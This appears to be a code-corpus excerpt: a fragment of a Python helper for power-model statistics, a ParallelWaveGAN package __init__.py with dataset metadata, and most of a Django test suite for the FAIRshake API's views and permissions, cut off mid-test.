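        if key.startswith(component) and key.endswith('/' + field)
    }

# A few entries copied from the Load Store Unit section above.
stats = {
    'Load Store Unit/Peak Dynamic': 2.53873,
    'Load Store Unit/LoadQ/Peak Dynamic': 0.0365295,
    'Load Store Unit/StoreQ/Peak Dynamic': 0.0900756,
    'Load Store Unit/Gate Leakage': 0.0350888,
}

# Select the Peak Dynamic figures for the Load Store Unit hierarchy:
# the unit itself plus its LoadQ and StoreQ sub-components.
peaks = field_for(stats, 'Load Store Unit', 'Peak Dynamic')
```

The same call works for any component prefix ('Execution Unit', 'Memory Management Unit', …) and any field name ('Runtime Dynamic', 'Subthreshold Leakage', …), since the keys are uniform across the dump.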
# parallel_wavegan/layers/__init__.py (maozhiqiang/ParallelWaveGAN, MIT license)
from parallel_wavegan.layers.causal_conv import * # NOQA
from parallel_wavegan.layers.pqmf import * # NOQA
from parallel_wavegan.layers.residual_block import * # NOQA
from parallel_wavegan.layers.residual_stack import * # NOQA
from parallel_wavegan.layers.upsample import * # NOQA
| 47.666667 | 60 | 0.807692 | 38 | 286 | 5.868421 | 0.342105 | 0.269058 | 0.426009 | 0.560538 | 0.699552 | 0.699552 | 0.38565 | 0 | 0 | 0 | 0 | 0 | 0.122378 | 286 | 5 | 61 | 57.2 | 0.888446 | 0.083916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
779b81bb70e4d1da67008ac1d937383ddc55309e | 36,312 | py | Python | FAIRshakeAPI/tests.py | Nitrogen-DCPPC/FAIRshake | af83c1cb82bdd41e6214d23ab6587d5a4c185b11 | [
"Apache-2.0"
] | 1 | 2019-04-15T14:02:03.000Z | 2019-04-15T14:02:03.000Z | FAIRshakeAPI/tests.py | Nitrogen-DCPPC/FAIRshake | af83c1cb82bdd41e6214d23ab6587d5a4c185b11 | [
"Apache-2.0"
] | 109 | 2018-05-21T19:45:19.000Z | 2019-04-19T12:09:06.000Z | FAIRshakeAPI/tests.py | Nitrogen-DCPPC/FAIRshake | af83c1cb82bdd41e6214d23ab6587d5a4c185b11 | [
"Apache-2.0"
] | 3 | 2018-08-06T22:09:33.000Z | 2018-12-09T18:52:46.000Z | import json
from django.test import TestCase, Client
from django.urls import reverse
from rest_framework.test import APIClient
from pyswaggerclient.util import bind
from . import models
from unittest import skip
def setUp(cls, Client=Client):
user = models.Author.objects.create(
username='test',
password='test',
)
metrics = [
models.Metric.objects.create(
title='yesnobut test',
type='yesnobut',
),
models.Metric.objects.create(
title='text test',
type='text',
),
models.Metric.objects.create(
title='url test',
type='url',
),
]
for metric in metrics:
metric.authors.add(user)
rubric = models.Rubric.objects.create(
title='rubric test',
)
rubric.authors.add(user)
for metric in metrics:
rubric.metrics.add(metric)
obj = models.DigitalObject.objects.create(
title='digital object test',
url='https://fairshake.cloud/',
)
obj.rubrics.add(rubric)
project = models.Project.objects.create(
title='project test',
)
project.authors.add(user)
project.digital_objects.add(obj)
assessment = models.Assessment.objects.create(
project=project,
target=obj,
rubric=rubric,
assessor=user,
)
for metric in metrics:
models.Answer.objects.create(
assessment=assessment,
metric=metric,
answer=1.0,
)
obj2 = models.DigitalObject.objects.create(
title='test object create',
url='https://fairshake.cloud'
)
cls.anonymous_client = Client()
cls.authenticated_client = Client()
cls.authenticated_client.force_login(user)
class ViewsFunctionTestCase(TestCase):
setUp = setUp
def test_project_viewset_list(self):
response = self.anonymous_client.get(reverse('project-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('project-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('project-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('project-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_digital_object_viewset_list(self):
response = self.anonymous_client.get(reverse('digital_object-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('digital_object-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('digital_object-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('digital_object-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_rubric_viewset_list(self):
response = self.anonymous_client.get(reverse('rubric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('rubric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('rubric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('rubric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_metric_viewset_list(self):
response = self.anonymous_client.get(reverse('metric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('metric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('metric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('metric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_assessment_viewset_list(self):
response = self.anonymous_client.get(reverse('assessment-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('assessment-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('assessment-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401, 'Permission denied expected')
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('assessment-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_score_viewset_list(self):
response = self.anonymous_client.get(reverse('score-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('score-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_project_viewset_detail(self):
response = self.anonymous_client.get(
reverse('project-detail', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(
reverse('project-detail', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(
reverse('project-detail', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
            reverse('project-detail', kwargs=dict(
                pk=models.Project.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)

    def test_digital_object_viewset_detail(self):
        response = self.anonymous_client.get(
            reverse('digital_object-detail', kwargs=dict(
                pk=models.DigitalObject.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.anonymous_client.get(
            reverse('digital_object-detail', kwargs=dict(
                pk=models.DigitalObject.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        response = self.authenticated_client.get(
            reverse('digital_object-detail', kwargs=dict(
                pk=models.DigitalObject.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            reverse('digital_object-detail', kwargs=dict(
                pk=models.DigitalObject.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)

    def test_rubric_viewset_detail(self):
        response = self.anonymous_client.get(
            reverse('rubric-detail', kwargs=dict(
                pk=models.Rubric.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.anonymous_client.get(
            reverse('rubric-detail', kwargs=dict(
                pk=models.Rubric.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        response = self.authenticated_client.get(
            reverse('rubric-detail', kwargs=dict(
                pk=models.Rubric.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            reverse('rubric-detail', kwargs=dict(
                pk=models.Rubric.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)

    def test_metric_viewset_detail(self):
        response = self.anonymous_client.get(
            reverse('metric-detail', kwargs=dict(
                pk=models.Metric.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.anonymous_client.get(
            reverse('metric-detail', kwargs=dict(
                pk=models.Metric.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        response = self.authenticated_client.get(
            reverse('metric-detail', kwargs=dict(
                pk=models.Metric.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            reverse('metric-detail', kwargs=dict(
                pk=models.Metric.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)

    def test_assessment_viewset_detail(self):
        response = self.anonymous_client.get(
            reverse('assessment-detail', kwargs=dict(
                pk=models.Assessment.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.anonymous_client.get(
            reverse('assessment-detail', kwargs=dict(
                pk=models.Assessment.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 401, 'Permission denied expected')
        self.assertEqual(response['Content-Type'], 'application/json', response)
        response = self.authenticated_client.get(
            reverse('assessment-detail', kwargs=dict(
                pk=models.Assessment.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            reverse('assessment-detail', kwargs=dict(
                pk=models.Assessment.objects.first().pk
            )),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)

    def test_assessment_prepare_all_params(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_prepare_no_params(self):
        response = self.anonymous_client.get(
            reverse('assessment-prepare'),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            reverse('assessment-prepare'),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_prepare_target(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_prepare_target_rubric(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}&rubric={rubric}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}&rubric={rubric}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_prepare_target_project(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}&project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}&project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                target=models.DigitalObject.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_prepare_rubric(self):
        response = self.anonymous_client.get(
            '{baseUrl}?rubric={rubric}'.format(
                baseUrl=reverse('assessment-prepare'),
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?rubric={rubric}'.format(
                baseUrl=reverse('assessment-prepare'),
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_prepare_rubric_project(self):
        response = self.anonymous_client.get(
            '{baseUrl}?rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_prepare_project(self):
        response = self.anonymous_client.get(
            '{baseUrl}?project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?project={project}'.format(
                baseUrl=reverse('assessment-prepare'),
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_all_params(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_target_only(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_target_rubric(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}&rubric={rubric}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}&rubric={rubric}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_target_project(self):
        response = self.anonymous_client.get(
            '{baseUrl}?target={target}&project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?target={target}&project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                target=models.DigitalObject.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_rubric(self):
        response = self.anonymous_client.get(
            '{baseUrl}?rubric={rubric}'.format(
                baseUrl=reverse('assessment-perform'),
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?rubric={rubric}'.format(
                baseUrl=reverse('assessment-perform'),
                rubric=models.Rubric.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_rubric_project(self):
        response = self.anonymous_client.get(
            '{baseUrl}?rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?rubric={rubric}&project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                rubric=models.Rubric.objects.first().pk,
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_project_only(self):
        response = self.anonymous_client.get(
            '{baseUrl}?project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            '{baseUrl}?project={project}'.format(
                baseUrl=reverse('assessment-perform'),
                project=models.Project.objects.first().pk,
            ),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_assessment_perform_no_params(self):
        response = self.anonymous_client.get(
            reverse('assessment-perform'),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            reverse('assessment-perform'),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_add_rubric(self):
        response = self.anonymous_client.get(
            reverse('rubric-add'),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.post(
            reverse('rubric-add'),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_stats_project_view(self):
        response = self.anonymous_client.get(
            reverse('project-stats', kwargs=dict(
                pk=models.Project.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.get(
            reverse('project-stats', kwargs=dict(
                pk=models.Project.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_modify_project_view(self):
        response = self.authenticated_client.get(
            reverse('project-modify', kwargs=dict(
                pk=models.Project.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        response = self.authenticated_client.post(
            reverse('project-modify', kwargs=dict(
                pk=models.Project.objects.first().pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)

    def test_project_remove(self):
        # this test exercises the 'project-remove' view, so it checks the
        # Project model (the original name and assertion referred to
        # DigitalObject by mistake)
        pk = models.Project.objects.first().pk
        response = self.anonymous_client.get(
            reverse('project-remove', kwargs=dict(
                pk=pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302, 'Login redirect expected')
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        # the anonymous request must not have deleted the project
        self.assertEqual(models.Project.objects.first().pk, pk)
        response = self.authenticated_client.get(
            reverse('project-remove', kwargs=dict(
                pk=pk
            )),
            HTTP_ACCEPT='text/html',
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
        try:
            models.Project.objects.get(pk=pk)
            self.fail('Project was not deleted')
        except models.Project.DoesNotExist:
            pass


class InteractFunctionTestCase(TestCase):
    setUp = bind(setUp, Client=APIClient)

    def test_project_create(self):
        response = self.anonymous_client.post(
            '/project/',
            {'title': 'test project 2'},
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 401)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        try:
            models.Project.objects.get(title='test project 2')
            self.fail('Project was created')
        except models.Project.DoesNotExist:
            pass
        response = self.authenticated_client.post(
            '/project/',
            {'title': 'test project 2'},
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 201)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        try:
            models.Project.objects.get(title='test project 2')
        except models.Project.DoesNotExist:
            self.fail('Project was not created')

    def test_project_update(self):
        response = self.anonymous_client.put(
            '/project/{pk}/'.format(pk=models.Project.objects.first().pk),
            {'title': 'test project improved'},
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 401)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        self.assertNotEqual(models.Project.objects.first().title, 'test project improved')
        # use PUT here as well; PATCH is covered by test_project_partial_update
        response = self.authenticated_client.put(
            '/project/{pk}/'.format(pk=models.Project.objects.first().pk),
            {'title': 'test project improved'},
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        self.assertEqual(models.Project.objects.first().title, 'test project improved')

    def test_project_partial_update(self):
        response = self.anonymous_client.patch(
            '/project/{pk}/'.format(pk=models.Project.objects.first().pk),
            {'description': 'test improved'},
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 401)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        self.assertNotEqual(models.Project.objects.first().description, 'test improved')
        response = self.authenticated_client.patch(
            '/project/{pk}/'.format(pk=models.Project.objects.first().pk),
            {'description': 'test improved'},
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        self.assertEqual(models.Project.objects.first().description, 'test improved')

    def test_project_destroy(self):
        pk = models.Project.objects.first().pk
        response = self.anonymous_client.delete(
            '/project/{pk}/'.format(pk=pk),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 401)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        self.assertEqual(models.Project.objects.first().pk, pk)
        response = self.authenticated_client.delete(
            '/project/{pk}/'.format(pk=pk),
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 204)
        # a 204 response has no body, so its Content-Type is not checked
        try:
            models.Project.objects.get(pk=pk)
            self.fail('Project was not deleted')
        except models.Project.DoesNotExist:
            pass

    def test_assessment_create(self):
        project = models.Project.objects.first()
        rubric = models.Rubric.objects.first()
        target = models.DigitalObject.objects.last()
        author = models.Author.objects.first()
        response = self.anonymous_client.post(
            '/assessment/',
            json.dumps({
                'project': project.id,
